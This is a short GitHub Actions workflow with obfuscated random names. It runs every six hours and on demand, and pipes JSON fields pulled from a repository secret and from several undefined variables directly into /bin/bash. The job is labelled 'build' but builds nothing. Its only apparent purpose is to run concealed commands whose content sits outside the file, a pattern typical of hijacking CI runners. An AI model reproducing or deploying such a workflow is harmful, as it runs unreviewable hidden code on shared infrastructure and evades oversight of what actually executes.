name: duibiff
on:
  workflow_dispatch:
  schedule:
    - cron: '2 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duibiff
        env:
          ppjos412: ${{ secrets.ppjos412 }}
        run: |
          echo $ppjos412 | jq -r .wno69779 | /bin/bash
          echo $o98641 | jq -r .dy014 | /bin/bash
          echo $xdim36687 | jq -r .ioh2 | /bin/bash
          echo $seqmq4476 | jq -r .hebr1 | /bin/bash
          echo $gizln0 | jq -r .y1586 | /bin/bash
          echo $udlvl414 | jq -r .ovdnh7115 | /bin/bash

